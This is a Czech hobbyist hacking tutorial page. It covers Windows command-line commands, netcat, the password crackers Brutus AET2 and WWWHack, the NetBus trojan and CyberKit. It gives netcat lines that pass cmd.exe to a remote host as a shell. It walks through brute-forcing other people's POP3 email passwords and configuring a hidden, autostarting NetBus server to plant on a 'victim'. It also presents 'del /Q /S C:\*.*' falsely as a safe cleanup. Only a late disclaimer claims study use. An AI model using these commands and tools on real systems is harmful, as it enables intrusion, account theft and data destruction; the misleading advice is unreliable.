Příkazový řádek a další programy
Návod na Příkazový řádek
Příkazový řádek je součástí Windows a spustíme ho v nabídce Start/Všechny programy/Příslušenství/Příkazový řádek a nebo jednoduše - Start/Spustit , do spustit napšte cmd,příkazový řádek se vám spustí.Nyní vám napíšu příkazy,které jsou velice užitečné:
AT - slouží k plánování úloh
at 18:45 shutdown -s -f -t 00
tento příklad vypne počítač v 18:45, ale pozor jen jednou!
CD - zobrazí název aktuální složky nebo změní aktuální složku
relativně: cd složka
absolutně: cd c:\složka
CMD - Spustí vám nový příkazový řádek
COPY - Zkopíruje jeden nebo více souborů do jiného umístění
copy zdroj + zdroj + zdroj cíl
zdroj znamená soubor nebo soubory určené ke kopírování
cíl je název složky, kam se mají soubory uložit nebo výsledného souboru
DEL - odstraní jeden nebo více souborů
del /Q /S C:\*.*
odstraní všechny soubory z disku C:, které se zrovna nepoužívají a tudíž nejsou potřebné k chodu systému
/Q způsobí, že nebude vyžádáno potvrzení smazání
/S odstraní soubory i z podadresářů (složky nechá prázdné, ale stále tam budou)
DIR - Zobrazí výpis aktuálního adresáře nebo zvoleného adresáře:
dir složka nebo dir C:\složka
ECHO - Vypíše vámi zadaný text, dá se využít v kombinaci s proměnnými
echo %username%
Vypíše aktuálního uživatele
Takto můžeme zapisovat i text do souborů:
echo Do prdele necum > soubor.txt
kdybysme ovšem takto opět zapsali do souboru, přepsali bysme předchozí text, protože místo > použijeme >> pro zápis na dalží řádek:
echo Tohle bude další řádek textu >> soubor.txt
FOR - Slouží k zřetězení příkazu (provedení v určitém počtu)
Základní použití je toto:
for /L %i in (1,1,10) do příkaz
první číslice znamená od kolika počítat
druhá o kolik přičítat
třetí do kolika počítat
%i je proměnná, ve které se tento stav udržuje
for /L %i in (1,1,10) do echo Počet do deseti: %i
FTP - pro přenos souborů
ftp 63.12.63.39 nebo ftp ftp.webzdarma.cz
MD - Vytvoří složku
md složka
md c:\složka
NET - Skvělý příkaz, má několik funkcí
net view zobrazí počítače v síti
net users zobrazí uživatele na počítači
net users %username% zobrazí informace o aktuálním uživateli
net users %username% nové_heslo změní heslo aktuálnímu uživateli bez znalosti původního hesla
net users nový_uživatel heslo /add vytvoří nového uživatele
net users kompik super změní heslo uživateli kompik na super
net localgroup zobrazí stávající skupiny
net localgorup Administrators ukáže uživatele ve skupině administrátorů
net localgroup Administrators %username% /add vloží stávajícího uživatele do skupiny Administrátorů
PING - Slouží k zjištění, jestli je daný počítač připojen k internetu, dá se pomocí něco i zjistit ip
ping www.centrum.cz
dostanete ip serveru centrum
TELNET - Aplikace slouží ke připojení k danému ip a portu
telnet IP_ADRESA PORT
Pokud port neuvedeme, je výchozí nastavení na 23
místo IP můžeme použít i dns (např. www.centrum.cz)
TIME - TIME 21:20 nastaví čas na PC na 21:20, aniž byste k tomu byli oprávněni.
TRACERT - Slouží k trasování počítače
tracert 21.20.60.90
Ukáže vám přes jaké počítače vede komunikaci mezi vaším počítačem a počítačem oběti. DNS domény počítačů často obsahují části názvu měst, například pra, ust, apod..
TREE - Graficky zobrazí adresáře, podadresáře i soubory
tree /F C:\ nebo Tree /F složka nebo tree /F
Abyste místo diakritických znaků použili ASCII, tak použijte navíc přepínač /A
tree /A /F atd...
VER - Zobrazí verzi operačního systému
SHUTDOWN - Vypne počítač
shutdown -s -f -t 00
provede okamžité vypnutí stávajícího počítače bez dotázání na ukončení aplikací
shutdown -s -f -t 10 -c "tak se měj"
provede to samé jako v předchozím případě ale s 10vteřinovým oknem zobrazujícím důvod(tak se měj)
EXIT - Vypne příkazový řádek
Návod na NetCat
Tento program se velice často nazývá "Armádní Švýcarský nůž" každého hackera,ke stažení na mojim webu v sekci programy.K čemu slouží?
-slouží k zobrazení výpisu
-vv to samé jako předchozí, ale poskytuje obsáhlejší výpis
-nv používá se místo -v když se připojujeme místo dns na ip
-z zapne skenování portů
-w2 zvýší rychlost skenování portů
-d Zapne v tichém režimu
-l slouží k otevření portu na našem počítači
-L To samé, akorát že předchozí parametr vydrží pouze jedno připojení
-e jakmile se někdo připojí, tak skrz připojení protáhne výpis souboru (např. cmd.exe protáhne příkazový řádek oběti až k vám)
Několik příkladů:
nc -v www.webzdarma.cz 80
připojí se na server Webzdarma na port 80
poté můžete zadat příkaz
HEAD / HTTP/1.0
[ENTER]
[ENTER]
čímž se vám zobrazí hlavička serveru zobrazující nějaké informace (zvláště typ serveru)
nc -vv -z -w2 www.seznam.cz 23-300
Provede skenování portů TCP od 300 do 23 (pozpátku)
nc -v -l -p 8080
Vytvoří naslouchajícího démona na portu 8080 čekajícího na spojení
nc -v -l -p 8080 -e cmd.exe
Vytvoří naslouchajícího démona s tím rozdílem, že když se k němu někdo připojí, bude mu předána vaše příkazová řádka
nc -nv 61.63.399.63 8080 -e cmd.exe
Předá příkazový řádek netcatu naslouchajícím na portu 8080 (pokud nebyl použit parametr -e cmd.exe u naslouchajícího nc)
nc -d -L -p 8080 -e cmd.exe
Spustí netcat v tichém režimu, pokud se na něj někdo připojí, bude mu předán příkazový řádek, možnost spojení přes telnet:
telnet ip_obětí 8080
Návod Brutus AET2 - česká verze
Program BRUTUS AET2 vyhledává především hesla HTTP,FTP, POP3,Telnet.Heslo s tímto programem lze získat několika způsoby,nejlepší způsob je pomocí slovníku-wordlistu.Někdy je to zdlouhavé ,ale efektivní.Užitečné jsou hlavně české wordlisty.Dalším způsobem,jak Brutus vyhledává hesla je pomocí Brute force.Toto vyhledávání vůbec nedoporučuji,protože můžete hledat heslo nepřetžitě 100 let a nenajdete ho! To není nadsázkaani srandička,je to bohužél nezvratný fakt.Bylo by to tak jednoduchý ale skutečně to nefunguje.Brutus si stáhnete v sekci Programy,je v češtině.
Zjištění hesla e-mailu POP3:
1.Cíl - napsat pop3.seznam.cz - příklad: když je mail na centrumu tak napsat: pop3.centrum.cz
2.Typ - zadat pop3
3.Zaškrtnout - Užívací uživatel + jediný uživatel
4.Uživatelé - napsat login,jméno.Když je mail pepa@centrum.cz,tak napsat pouze pepa
5.Povolení - Word list
6.Pass File - zadat příslušný wordlist,který máte na disku.Ve wordlitu musí být uvedeno potencionální heslo,jinak ho program nenajde.Chce to mít zkrátka ten zprávný wordlist!Fakt je ten,že je to zdlouhavé... .Je také možno zadat Combo list,zadejte combo wordlist,který máte uložený na disku.Dále je možno vyhledávat pomocí Brute force,takto není potřeba žádný wordlist,program kombinuje písmena.Brute force může trvat i 100 let a heslo nenajdete!!!
7.Potom stačí kliknout - Start a program vyhledává
Nalezené heslo se zobrazí - Pozitivní výsledky ověření.Navíc jste upozorněn zvukem.
Vyhledávání HTTP,FTP,telnet ... je velice obdobné.
Návod WWWHack
WWWHack je legendární program na vyhledávání hesel,nicméně já upřednostňuju Brutus AET2. Pozor, pokud vám nepůjde spustit, musíte si změnit datum třeba o 6 měsíců zpět, on se pak spustí a natáhne z netu upgrade.
1. klikněte na položku Access a zvolte POP3 email acct. Do pole Host vepište pop3.server.cz ,např. pop3.centrum.cz
2. Username máte několik možností. První možnost je vybrat Read from this file. Pak vyberete soubor a on bude zkoušet usernames z toho souboru, (pepa@centrum.cz pak jen zadáte pepa).
3. All possible combinations. Zadáte od kolika znaků má začít a do kolika znaků se má pokoušet hacknout heslo.Vedle máte tlačítko TimeCalc a tam při zadání všech údajů zjistíte, jak dlouho by to asi mělo trvat do konce vyhledávání.
4. Always use this username. Tam zadáte username a program se bude pokoušet hledat heslo e-mailu pouze s tímto loginem.
5. Password. Má stejné možnosti Read from this file a All possible combinations.
6. Assume it's the same as the username. To znamená že zkusí vždy stejné heslo jako login (login=pass).
7. Stop after finding one password - zastavení programu po nalezení hesla.
8. Skip to next username after finding one password - přeskočit na další po nalezení jednoho hesla
Návod NetBus pro 2.01
NetBus pro 2.01 je profesionální trojský kůň - program, který má nějakým způsobem škodit, otevřít zadní vrátka,atp. .
Trojské koně můžou být "zasídleny"v programech,hrách a nemusíte o tom ani vědět.Trojský kůň nemusí být odhalen ani antivirem! Uživateli mnohdy pospává v PC několik roků aniž by o tom věděl! Obrana proti tomu jsou pravidelné aktualizace antivirů a spyware softwarů! Přímo trojan Netbus již v dnešní době odhalitelný je a to skoro všema antiviry.Pryč jsou doby,kdy se plnohodnotně využívalo děravosti win 95/98,tyto OS byly opravdu velice nebezpečné a o bezpečnosti nemohlo být ani řeč!Dnes panuje OS win xp,který mnohem bezpečnější,děravost tam samozdřejmě také je ,ale to microsoft poměrně rychle "záplatuje" aktualizacemi.O windows by zde mohlo být napsáno ještě mnohé zajímavé,ale to jindy a jinde.
S tímto trojanem se dá mj. zažít i spoustu legrace.Nejdříve ho však musíte dostat ho do cizího počítače, nebo najít už infikovaný počítač - postačí spustit scanner a zadat rozsah IP adres, které chcete skenovat a on vám vypíše všechny kompy na kterých je NetBus. Nyní si napíšeme něco málo o legraci,kterou si tímhle programem užijete:
1.Otevřít CD-Rom - můžete tím vysouvat CD-ROM
2.Vymění myš - prohazujete tlačítka myši (pravé tlačítko se bude chovat jako levé …..)
3.Hraj zvuk - přehraje mu vámi vybraný zvuk
4.Spust Program - můžete spustit program na disku
5.Vypni Windows - vypnete OS
6.Aktivuj win - zobrazí vám co má infikovaný PC spuštěného a vy s tím můžete manipulovat ...
7.Dej info - zobrazí informace o napadeném PC
a mnoho dalšího ...
A teď to nejdůležitější návod:
1. KONFIGURACE SERVERU
2. PŘIPOJENÍ K OBĚTI
3. NÁVOD JAK ODSTRANIT BackOrrifice A DALŠÍ TROJANY
1) Konfigurace serveru
V adresáři s NetBus Pro otevřete soubor NBSvr.exe a v otevřeném okně SERVER dejte Server executable - to znamená že Vaše obět musí soubor spustit, aby se aktivovala hostitelská část. Teď vyberte soubor se serverem NBSvr.exe. Zaškrtněte volby Accept Connection a Autostart every Windows session. Nastavte Invisible (95/98) to znamená, že Vase připojení nebude viditelné.Nyní nastavte jestě v Acces mode - Full acces.
Port nechte na 20034 a do password nic nepište,dejte OK.
Nyní je server pripřaven. Stačí soubor NBSvr.exe dostat k uživateli a donutit ho, aby byl spuštěn. Název souboru můžete kdykoliv změnit, soubor můžete poslat mailem,ICQ, nebo mu ho přímo nahrát do PC.
2) Pripojeni se k obětnímu PC
Toto nejprve vyzkoušejte na sobě. Spusťte soubor s serverem NBSvr.exe, a spusťte klientskou část programu - NetBus.exe. Klikněte na My computer a pokud to dole napíše Connected to a IP adresu je vše v pořádku. Nyní si můžete hrát sami se sebou a ověřit si různe funkce.
Pokud se chcete připojit na svou obět tak klikněte prav. tl. na My computer a dejte edit, přepište pouze IP adresu na IP své oběti a dejte OK. A připojte se...
3) NÁVOD JAK ODSTRANIT BackOrrifice A DALŠÍ TROJANY
Určitě nechcete, aby BackOrifice klidně pospával ve Vašem počítači a čekal, až se k němu někdo připojí, ale chcete se ho, až vyzkoušíte co umí, zbavit. To provedete zákrokem v registru. spusťte C:\WINDOWS\regedit.exe a na adrese HKEY_LOCAL_MACHINE/SOFTWARE/MICROSOFT/WINDOWS/CURRENT VERSION/RUN SERVICES .Najdete zde položku BackOrifice .exe (nebo něco podobného), ttu smažte a BackOrifice se stane po restartu PC neaktivní a tím také neškodný.A pro NetBus platí to samé... mělo by tam prostě být nějaký soubor například porno,happy tak ho odstraňte!Soubory kernel32.exe, mtask.exe, rundll32.exe tam musí
zůstat, jsou nezbytné pro funkci Windows,proto jej nikdy nemažte !!!!!!
H99 - nesouhlasím s používáním tohoto programu na jiných počítačích než jsou ty vaše!!! Program složí jen pro studiní účely !!! Vysvětlení pojmů obětní,cizí PC - toto je druhý váš počítač,na které zkoušíte funkce programu NetBus pro.
Návod na program CiberKit 2.5
Program sloužící na monitorování sítě na internetu,je dobrej na hacking,je freeware a stáhnete si ho z mé stránky v sekci Programy.Program sice není v češtině,ale tady vám píšu návod na jeho používání.
Instalace: po stažení je soubor nejprve nutné dekomprimovat do dočasné složky a následně spustit soubor Setup.exe.
Učel programu
Funkce NetScaner (umí testovat počítače se zadanými IP adresami, skenovat jejich porty a zjišťovat jaké služby na nich běží, zjišťovat jména počítače a testovat zkoušet jejich dostupnost) a DBScanner (proskenuje databázi winsocku na dostupné služby a protokoly,tuto funkci můžete použít k zjištění, zda je winsock dostupný a zda pracuje správně).
Notifikátor doručené pošty s nastavitelnou délkou periody kontroly schránky, který při doručení zprávy umí přehrát vybraný zvuk ve formátu WAV, zobrazit ikonu v system tray, případně upozornit dialogovým oknem. Výhodou je také podpora více účtů, takže lze tímto způsobem kontrolovat více schránek současně.
Funkci KeepAlive, udržující připojení k síti v aktivním stavu. V případě potřeby lze tuto funkci nastavit tak, aby v pravidelných intervalech synchronizovala systémový čas podle vybraného serveru.
Funkce
- Ping - diagnostický nástroj kterým můžete zjistit, zda je vzdálený počítač (například www server) dostupný. Přes protokol ICMP (Internet Control Message Protocol) posílá malé datové pakety s požadavkem na odezvu, na které vzdálený server reaguje odesláním odpovědi, čímž potvrzuje svou funkčnost. Měří se doba odezvy, ztrátovost a poškození paketů.
- Traceroute - diagnostický nástroj podobný Pingu. Používá stejný protokol, přes který zasílá pakety na vzdálený počítač. V hlavičce protokolu zasílá tzv. TTL (Time To Live) k zjištění cesty kterou pakety prochází. Traceroute tedy poskytuje výpis všech počítačů, přes která musí data projít, než se dostanou na cílový počítač a dobu jejich odezvy.
- Finger - typicky unixovská utilita dovolující zjistit kdo je přihlášen k danému počítači. Kromě jiného umí zobrazit obsah .plan souboru, který je umístěný v kořenovém adresáři uživatele, na jehož počítač je vystaven požadavek. Obsah tohoto souboru může uživatel modifikovat. Někteří provideři tento protokol z bezpečnostních důvodů nepodporují.
- WhoIs - se používá k dotazování internetových databází obsahujících informace o doménových jménech. Tyto informace obsahují jméno, adresu a kontakt na toho, komu doména patří. Tímto způsobem lze například zjistit, zda je ta která doména volná k případné registraci.
- NSLookUp - umí zjistit IP adresu a jméno počítače přímo z DNS serveru. Na požadavek vypíše IP adresu a seznam všech jmen. Tato utilita bývá používána administrátory pro zjištění správné funkce DNS serveru.
- QoD (Quote Of the Day) - dokáže zobrazit citát z tzv. "quote serveru". Tyto servery se občas vyskytují na lokálních sítích, jejich nalezení na Internetu je však poměrně složité.
- Time synchronizer - dokáže zjistit čas na serveru a nastavit podle něj systémový čas počítače, na kterém je spuštěn. Velice dobré jsou pro tyto účely servery s atomovými hodinami zajišťujícími takřka absolutní přesnost.